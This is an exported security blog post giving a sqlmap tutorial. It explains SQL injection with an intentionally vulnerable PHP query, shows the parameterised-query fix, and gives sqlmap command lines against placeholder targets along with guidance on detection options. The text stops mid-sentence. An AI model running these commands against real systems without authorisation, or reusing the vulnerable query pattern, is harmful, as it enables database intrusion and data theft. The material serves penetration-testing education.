{"id":4114,"date":"2026-09-23T19:12:26","date_gmt":"2026-09-23T19:12:26","guid":{"rendered":"https:\/\/hackagora.com\/?p=4114"},"modified":"2026-09-26T12:19:49","modified_gmt":"2026-09-26T12:19:49","slug":"sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli","status":"publish","type":"post","link":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/","title":{"rendered":"SQLmap: Comprehensive Guide to Understanding, Detecting and Exploiting SQL Injections (SQLi)"},"content":{"rendered":"\n<figure class=\"wp-block-image alignright size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/hackagora.com\/wp-content\/uploads\/2026\/09\/sqlmap-en.svg\" alt=\"SQLmap: Comprehensive Guide to Understanding, Detecting and Exploiting SQL Injections (SQLi)\" class=\"wp-image-4115\" style=\"width:290px;height:auto\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">SQL injections are among the long-standing vulnerabilities in web applications. Despite the widespread use of frameworks, ORMs and more secure data access mechanisms, they can still occur when user-controlled data directly influences the structure of a query executed by a database.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Manual exploitation remains essential for gaining a precise understanding of an SQLi. It enables one to identify the syntactic context, observe differences in responses and determine which techniques actually work. However, as soon as it becomes necessary to enumerate a database or reconstruct information via a blind injection, the number of queries can quickly become very large.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This is precisely the role of sqlmap: to automate a large part of the detection and exploitation processes, without, however, replacing the auditor\u2019s analysis.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In this article, we explain how sqlmap works, the various methods for feeding it HTTP requests, and the main parameters for configuring its detection mechanisms. We also explain in detail how to interpret the results obtained, exploit an identified SQL injection, and use certain advanced features of the tool as part of a penetration test.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">NB: The procedures described here must only be carried out on environments for which explicit authorisation to test has been obtained.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Comprehensive Guide to SQLmap<\/h2>\n\n\n<div class=\"wp-block-aioseo-table-of-contents\"><ul><li><a class=\"aioseo-toc-item\" href=\"#what-is-sqlmap\">What is SQLmap?<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#how-does-an-sql-injection-work\">How Does an SQL Injection Work?<\/a><ul><li><a class=\"aioseo-toc-item\" href=\"#what-is-an-sql-injection\">What is an SQL injection?<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#what-are-the-potential-consequences-of-an-sqli-attack\">What are the potential consequences of an SQLi attack?<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#main-sql-injection-techniques\">Main SQL injection techniques<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#how-to-prevent-sql-injections\">How to prevent SQL injections?<\/a><\/li><\/ul><\/li><li><a class=\"aioseo-toc-item\" href=\"#installing-and-getting-started-with-sqlmap\">Installing and Getting Started with SQLmap<\/a><ul><li><a class=\"aioseo-toc-item\" href=\"#install-and-update-sqlmap\">Install and update sqlmap<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#understanding-help-verbosity-and-sessions\">Understanding help, verbosity and sessions<\/a><\/li><\/ul><\/li><li><a class=\"aioseo-toc-item\" href=\"#how-to-specify-a-target-for-sqlmap\">How to Specify a Target for SQLmap?<\/a><ul><li><a class=\"aioseo-toc-item\" href=\"#testing-a-get-parameter-with-u\">Testing a GET parameter with -u<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#testing-post-data-with-data\">Testing POST data with \u2013data<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#using-a-complete-http-request-with-r\">Using a complete HTTP request with -r<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#specify-the-injection-point-precisely\">Specify the injection point precisely<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#testing-an-api-and-a-json-payload-with-sqlmap\">Testing an API and a JSON payload with sqlmap<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#managing-an-authenticated-application-and-specific-headers\">Managing an authenticated application and specific headers<\/a><\/li><\/ul><\/li><li><a class=\"aioseo-toc-item\" href=\"#configuring-sql-injection-detection-with-sqlmap\">Configuring SQL Injection Detection with SQLmap<\/a><ul><li><a class=\"aioseo-toc-item\" href=\"#focus-solely-on-the-relevant-parameters\">Focus solely on the relevant parameters<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#adjust-the-level-of-detail-using-level\">Adjust the level of detail using \u2013level<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#understanding-the-implications-of-risk\">Understanding the implications of \u2013risk<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#limit-techniques-using-technique\">Limit techniques using \u2013technique<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#force-the-dbms-using-dbms\">Force the DBMS using \u2013dbms<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#helping-sqlmap-to-compare-responses\">Helping sqlmap to compare responses<\/a><\/li><\/ul><\/li><li><a class=\"aioseo-toc-item\" href=\"#interpreting-the-results-returned-by-sqlmap\">Interpreting the Results Returned by SQLmap<\/a><ul><li><a class=\"aioseo-toc-item\" href=\"#parameter-identify-the-injection-point\">Parameter: identify the injection point<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#type-understanding-exploitation-techniques\">Type: understanding exploitation techniques<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#title-understanding-the-identified-sql-context\">Title: understanding the identified SQL context<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#payload-analysing-the-evidence-of-injection\">Payload: analysing the evidence of injection<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#identify-the-dbms-and-the-technical-context\">Identify the DBMS and the technical context<\/a><\/li><\/ul><\/li><li><a class=\"aioseo-toc-item\" href=\"#exploiting-an-sql-injection-with-sqlmap\">Exploiting an SQL Injection with SQLmap<\/a><ul><li><a class=\"aioseo-toc-item\" href=\"#confirm-the-injection\">Confirming the injection<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#identify-the-context-of-the-sql-connection\">Identifying the context of the SQL connection<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#list-the-accessible-bases\">Listing the accessible bases<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#list-the-tables\">Listing the tables<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#examining-the-structure-of-a-table\">Examining the structure of a table<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#understanding-data-volume\">Understanding data volume<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#extract-only-the-necessary-data\">Extract only the necessary data<\/a><\/li><\/ul><\/li><li><a class=\"aioseo-toc-item\" href=\"#how-does-sqlmap-exploit-blind-sql-injections\">How Does SQLmap Exploit Blind SQL Injections?<\/a><ul><li><a class=\"aioseo-toc-item\" href=\"#boolean-based-blind-sql-injection\">Boolean-based blind SQL injection<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#time-based-blind-sql-injection\">Time-based blind SQL injection<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#understanding-the-cost-of-a-blind-extraction\">Understanding the cost of a blind extraction<\/a><\/li><\/ul><\/li><li><a class=\"aioseo-toc-item\" href=\"#going-further-with-enumeration-using-sqlmap\">Going Further with Enumeration using SQLmap<\/a><ul><li><a class=\"aioseo-toc-item\" href=\"#identify-users-roles-and-privileges\">Identify users, roles and privileges<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#search-for-a-specific-table-or-column\">Search for a specific table or column<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#execute-a-targeted-sql-query\">Execute a targeted SQL query<\/a><\/li><\/ul><\/li><li><a class=\"aioseo-toc-item\" href=\"#optimising-sqlmap-without-overloading-the-application\">Optimising SQLmap Without Overloading the Application<\/a><ul><li><a class=\"aioseo-toc-item\" href=\"#speed-up-certain-processes-using-threads\">Speed up certain processes using \u2013threads<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#slow-down-requests-using-delay\">Slow down requests using \u2013delay<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#understanding-and-resetting-sqlmap-sessions\">Understanding and resetting sqlmap sessions<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#enforce-https-where-necessary\">Enforce HTTPS where necessary<\/a><\/li><\/ul><\/li><li><a class=\"aioseo-toc-item\" href=\"#using-tamper-scripts-with-sqlmap\">Using Tamper Scripts with SQLmap<\/a><ul><li><a class=\"aioseo-toc-item\" href=\"#understanding-the-role-of-tampers\">Understanding the role of tampers<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#space2comment-py\">space2comment.py<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#randomcase-py\">randomcase.py<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#equaltolike-py\">equaltolike.py<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#do-not-stack-the-tampers-randomly\">Do not stack the tampers randomly<\/a><\/li><\/ul><\/li><li><a class=\"aioseo-toc-item\" href=\"#from-sql-injection-to-server-compromise\">From SQL Injection to Server Compromise<\/a><ul><li><a class=\"aioseo-toc-item\" href=\"#read-a-file-using-file-read\">Reading a file using \u2013file-read<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#writing-to-a-file-using-file-write-and-file-dest\">Writing to a file using \u2013file-write and \u2013file-dest<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#run-a-command-with-os-cmd\">Run a command with \u2013os-cmd<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#why-an-sqli-does-not-automatically-mean-rce\">Why an SQLi does not automatically mean RCE<\/a><\/li><\/ul><\/li><li><a class=\"aioseo-toc-item\" href=\"#how-to-incorporate-sqlmap-into-a-penetration-testing-methodology\">How to Incorporate SQLmap into a Penetration Testing Methodology?<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#conclusion\">Conclusion<\/a><\/li><\/ul><\/div>\n\n\n<h2 id=\"what-is-sqlmap\" class=\"wp-block-heading\">What is SQLmap?<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap is an open-source penetration testing tool specialising in the detection and exploitation of SQL injections. It features an engine capable of adapting its tests to the injection point, the identified database management system, the available techniques and the observed behaviour of the application.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">When an injection is exploitable, sqlmap can, amongst other things, identify the DBMS, retrieve information about the SQL session, enumerate accessible databases, tables and columns, and then extract specific data in a targeted manner. Depending on the DBMS and the available privileges, the tool can also interact with the file system or use database engine features to execute commands on the operating system.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This automation does not mean that sqlmap replaces a technical understanding of an SQL injection. In a penetration test, the tool is generally much more effective when the tester has already identified the entry point, understood the query structure and observed the application\u2019s constraints.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Running sqlmap indiscriminately across an entire application generates traffic, increases noise and can complicate the analysis. A more effective approach is often to manually identify suspicious behaviour, then use sqlmap to confirm the injection and automate repetitive steps.<\/p>\n\n\n\n<h2 id=\"how-does-an-sql-injection-work\" class=\"wp-block-heading\">How Does an SQL Injection Work?<\/h2>\n\n\n\n<h3 id=\"what-is-an-sql-injection\" class=\"wp-block-heading\">What is an SQL injection?<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">A web application needs to regularly send information to a database: to search for a user, display a product, record an order, check access rights or retrieve a resource.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Let\u2019s take a simplified example in PHP:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$id = $_GET&#91;'id'];\n\n$query = \"SELECT name, description, price\n          FROM products\n          WHERE id = \" . $id;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">A legitimate request might be:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/product?id=42 HTTP\/1.1\nHost: example.test<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The application then constructs an SQL query similar to:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT name, description, price\nFROM products\nWHERE id = 42;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The problem stems from the fact that the value entered by the user is directly concatenated into the query. The user therefore does not merely control a piece of data: they can potentially influence the syntax sent to the SQL engine.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This blurring of the lines between data and SQL statements is the fundamental principle behind an SQL injection.<\/p>\n\n\n\n<h3 id=\"what-are-the-potential-consequences-of-an-sqli-attack\" class=\"wp-block-heading\">What are the potential consequences of an SQLi attack?<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The impact of an SQL injection varies greatly depending on the context. An initial injection may only allow the attacker to infer some information relating to the vulnerable query. Another may grant access to all the data contained in several tables or databases accessible to the SQL user.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Sensitive information may then be exposed: user accounts, personal data, business data, tokens, application secrets, administrative information or data used by other components.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Some injections also allow data to be modified or deleted. Finally, where the DBMS provides suitable functionality and the application account has elevated privileges, the exploit may sometimes extend beyond the database to affect the operating system.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">It is therefore important not to treat all SQLi attacks as equivalent. The exploitation phase serves precisely to determine how far the vulnerability actually allows one to go, using the minimum actions necessary to demonstrate its impact.<\/p>\n\n\n\n<h3 id=\"main-sql-injection-techniques\" class=\"wp-block-heading\">Main SQL injection techniques<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">An injection can be exploited using various techniques.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>With a UNION-based SQL injection, the attacker adds a second SELECT query to the one executed by the application so that the information they are seeking is included in the returned result.<\/li>\n\n\n\n<li>An error-based SQL injection exploits the error messages generated by the DBMS. Certain constructs can be used to deliberately trigger an error containing information from the database.<\/li>\n\n\n\n<li>In a boolean-based blind SQL injection, no data is returned directly. The attacker submits true and false conditions and then observes differences in the application\u2019s behaviour to gradually reconstruct the information sought.<\/li>\n\n\n\n<li>A time-based blind SQL injection is based on the same logic, but uses response time as the channel. A true condition can, for example, deliberately cause a delay at the DBMS level.<\/li>\n\n\n\n<li>Finally, when several SQL statements can be executed in succession, this is referred to as \u2018stacked queries\u2019. This capability can significantly expand the scope for exploitation, particularly when seeking to execute statements that do not directly return a result.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap uses the letters B, E, U, S, T and Q to denote, respectively, Boolean-based blind, error-based, UNION query, stacked queries, time-based blind and inline queries.<\/p>\n\n\n\n<h3 id=\"how-to-prevent-sql-injections\" class=\"wp-block-heading\">How to prevent SQL injections?<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The main protective measure is to use parameterised queries, also known as prepared statements.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Instead of constructing an SQL statement by directly concatenating a user-controlled value, the application defines the structure of the query and its parameters separately.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For example:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$stmt = $pdo->prepare(\n    \"SELECT name, description, price\n     FROM products\n     WHERE id = ?\"\n);\n\n$stmt->execute(&#91;$id]);<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">In this case, the DBMS treats the value provided as data rather than as part of the SQL syntax. This separation is the main defence recommended by OWASP against SQL injection.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The principle of least privilege also remains essential. An application that uses an SQL account restricted to strictly necessary operations significantly reduces the potential impact of an injection, even if a vulnerability remains in the code.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">To learn more about injection mechanisms and best practices for prevention, our guide on SQL injections details the main exploitation scenarios and the associated protective measures: <a href=\"https:\/\/hackagora.com\/en\/sql-injection-sqli-types-exploitation-and-security-best-practices\/\" target=\"_blank\" rel=\"noopener\">SQL Injection (SQLi): Types, Exploitation and Security Best Practices<\/a>. <\/p>\n\n\n\n<h2 id=\"installing-and-getting-started-with-sqlmap\" class=\"wp-block-heading\">Installing and Getting Started with SQLmap<\/h2>\n\n\n\n<h3 id=\"install-and-update-sqlmap\" class=\"wp-block-heading\">Install and update sqlmap<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap is written in Python and can be downloaded directly from its <a href=\"https:\/\/github.com\/sqlmapproject\/sqlmap\" target=\"_blank\" rel=\"noopener\">official Git repository<\/a>. The recommended method is to clone the project:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>git clone --depth 1 https:\/\/github.com\/sqlmapproject\/sqlmap.git sqlmap-dev\ncd sqlmap-dev<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The tool can then be launched directly:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py -h<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Installation via PyPI is also available:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>pip install --upgrade sqlmap<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">To update a copy retrieved from Git:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py --update<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">or:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>git pull<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Before a major audit, working with a recent version helps to avoid identifying issues that may already have been rectified or improved within the project.<\/p>\n\n\n\n<h3 id=\"understanding-help-verbosity-and-sessions\" class=\"wp-block-heading\">Understanding help, verbosity and sessions<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The -h option displays the main options available:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py -h<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The -hh option displays the full help:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py -hh<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap also offers several levels of verbosity using the -v option. For example:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py -r request.txt -v 3<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">provides further information about the payloads being tested. Higher levels reveal more details about HTTP exchanges and make it easier to diagnose issues when the tool\u2019s behaviour appears inconsistent.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Finally, sqlmap automatically retains session information for targets that have already been tested. This persistence speeds up subsequent runs, but it can also give the impression that a test is being rerun when the tool is simply reusing a previous detection. We will return later to the \u2013flush-session option, which allows you to start afresh.<\/p>\n\n\n\n<h2 id=\"how-to-specify-a-target-for-sqlmap\" class=\"wp-block-heading\">How to Specify a Target for SQLmap?<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap supports several input formats. In a web penetration test, the most useful are generally a URL provided directly on the command line or a complete HTTP request exported from an interception proxy.<\/p>\n\n\n\n<h3 id=\"testing-a-get-parameter-with-u\" class=\"wp-block-heading\">Testing a GET parameter with -u<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The simplest approach is to provide a URL using the -u option:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -u \"https:\/\/target.example\/product?id=42\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap identifies parameters present in the URL and can test them as potential injection points.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">When the parameter of interest is already known, it is best to specify it using the -p option:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -u \"https:\/\/target.example\/product?id=42\" \\\n  -p id<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This selection reduces the number of queries and avoids testing irrelevant values.<\/p>\n\n\n\n<h3 id=\"testing-post-data-with-data\" class=\"wp-block-heading\">Testing POST data with \u2013data<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">For a standard POST request, the data can be provided using \u2013data:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -u \"https:\/\/target.example\/search\" \\\n  --data=\"category=books&amp;sort=price\" \\\n  -p category<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The tool then treats the parameters in the request body as potential injection points.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">When an API uses a different HTTP method, the \u2013method option can be used to explicitly force it:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -u \"https:\/\/target.example\/api\/item\/42\" \\\n  --method=PUT \\\n  --data='{\"name\":\"test\"}'<\/code><\/pre>\n\n\n\n<h3 id=\"using-a-complete-http-request-with-r\" class=\"wp-block-heading\">Using a complete HTTP request with -r<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">In a real-world penetration test, the -r option is often one of the most useful. A request captured using Burp Suite can be saved to a file:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/product?id=42 HTTP\/1.1\nHost: target.example\nCookie: session=eyJhbGciOi...\nUser-Agent: Mozilla\/5.0\nAccept: text\/html\nConnection: close<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And then passed directly to sqlmap:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py -r request.txt<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This method preserves cookies, headers, POST data and other elements required to faithfully reproduce the request. Above all, it avoids having to manually reconstruct a complex request on the command line.<\/p>\n\n\n\n<h3 id=\"specify-the-injection-point-precisely\" class=\"wp-block-heading\">Specify the injection point precisely<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">When the injection point is already known, it is best to specify it explicitly.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">One option is to use the -p option:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  -p TrackingId<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Another option is to place the * character exactly where sqlmap is to inject its payloads.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For example, in a cookie:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Cookie: TrackingId=abc123*; session=eyJhbGciOi...<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This syntax also works in various locations within a request and becomes particularly useful when the injectable data is nested within a more complex structure.<\/p>\n\n\n\n<h3 id=\"testing-an-api-and-a-json-payload-with-sqlmap\" class=\"wp-block-heading\">Testing an API and a JSON payload with sqlmap<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Modern applications frequently return their data in JSON format. In such cases, using a complete request with the -r option is often the most readable approach.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Example:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/api\/products\/search HTTP\/1.1\nHost: target.example\nContent-Type: application\/json\nAuthorization: Bearer eyJhbGciOi...\n\n{\n  \"category\": \"books*\",\n  \"sort\": \"price\"\n}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The request can then be used with:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py -r api-request.txt<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The asterisk here indicates that payloads must be injected into the \u2018category\u2019 value.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Recent versions of sqlmap can also derive targets from an OpenAPI or Swagger specification using the \u2013openapi option. This feature can be useful for exploring a documented API, but it should be used selectively to avoid unnecessarily generating tests across a large number of routes.<\/p>\n\n\n\n<h3 id=\"managing-an-authenticated-application-and-specific-headers\" class=\"wp-block-heading\">Managing an authenticated application and specific headers<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">An SQL injection may occur behind an authentication mechanism. When a session is based on a cookie, the cookie can be provided directly:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -u \"https:\/\/target.example\/account?id=42\" \\\n  --cookie=\"session=0123456789abcdef\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">For an endpoint using a bearer token:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -u \"https:\/\/target.example\/api\/orders?id=42\" \\\n  --headers=\"Authorization: Bearer eyJhbGciOi...\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">In more complex cases, an authenticated request recorded with Burp Suite and used via the -r option is generally easier to maintain.<\/p>\n\n\n\n<h2 id=\"configuring-sql-injection-detection-with-sqlmap\" class=\"wp-block-heading\">Configuring SQL Injection Detection with SQLmap<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Once the target has been specified, sqlmap analyses the application\u2019s behaviour and sends various payloads to determine whether a parameter actually influences an SQL query.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">It therefore does not merely seek to trigger an error. Depending on the technique, the tool compares true and false responses, attempts UNION constructions, analyses error messages or measures controlled response times.<\/p>\n\n\n\n<h3 id=\"focus-solely-on-the-relevant-parameters\" class=\"wp-block-heading\">Focus solely on the relevant parameters<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">When dealing with a query containing numerous parameters, it is rarely practical to test everything systematically.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">When the suspected vulnerability is already known:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  -p id<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap also offers mechanisms for skipping certain parameters or filtering the locations to be tested. The key principle is simple: the more specific the target, the clearer the analysis and the less traffic is generated.<\/p>\n\n\n\n<h3 id=\"adjust-the-level-of-detail-using-level\" class=\"wp-block-heading\">Adjust the level of detail using \u2013level<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u2013level defines the comprehensiveness of the tests carried out by sqlmap. Its value can range from 1 to 5.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">At a low level, sqlmap limits the number of payloads and the locations tested. As the level increases, the tool gradually expands its coverage. GET and POST parameters are tested by default, whilst cookies and then certain headers may be automatically included at higher levels.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">It may be tempting to use the following straight away:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --level=5<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">However, this option significantly increases the number of requests. In a penetration test, it is often preferable to start in a targeted manner and then gradually increase the \u2013level setting when the context warrants it.<\/p>\n\n\n\n<h3 id=\"understanding-the-implications-of-risk\" class=\"wp-block-heading\">Understanding the implications of \u2013risk<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u2013risk controls the category of payloads that sqlmap is permitted to use. The default setting favours relatively low-risk tests. Higher levels introduce more intensive or potentially more dangerous tests.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For example, depending on the position of the injection within an UPDATE query, certain logical payloads could theoretically result in more records being modified than intended.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The fact that an option exists does not therefore mean that it should be enabled systematically:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --risk=3<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">should only be used after understanding the context of the vulnerable query and the potential effects of the tests.<\/p>\n\n\n\n<h3 id=\"limit-techniques-using-technique\" class=\"wp-block-heading\">Limit techniques using \u2013technique<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Where an injection has already been identified manually, there is no need to test all payload families.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For a boolean-based blind injection:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --technique=B<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">For a time-based blind attack:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --technique=T<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">It is also possible to combine several letters when you wish to allow multiple techniques. Limiting the scan to relevant methods often saves time and reduces the volume of requests.<\/p>\n\n\n\n<h3 id=\"force-the-dbms-using-dbms\" class=\"wp-block-heading\">Force the DBMS using \u2013dbms<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap normally attempts to automatically identify the database management system. Where this information is already known, it can be specified directly:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --dbms=PostgreSQL<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">or:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --dbms=MySQL<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This optimisation is particularly useful when the DBMS has been identified from an error message, source code in a white-box audit, or manual testing.<\/p>\n\n\n\n<h3 id=\"helping-sqlmap-to-compare-responses\" class=\"wp-block-heading\">Helping sqlmap to compare responses<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Blind injections rely on an observable signal distinguishing between a true condition and a false condition. When a page contains a lot of dynamic content, sqlmap may struggle to distinguish between the two cases.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u2013string allows you to specify a string that is present when the condition is true:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --string=\"Welcome back\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Conversely, the \u2013not-string option can identify a string associated with the false condition:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --not-string=\"Invalid tracking ID\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap can also rely on 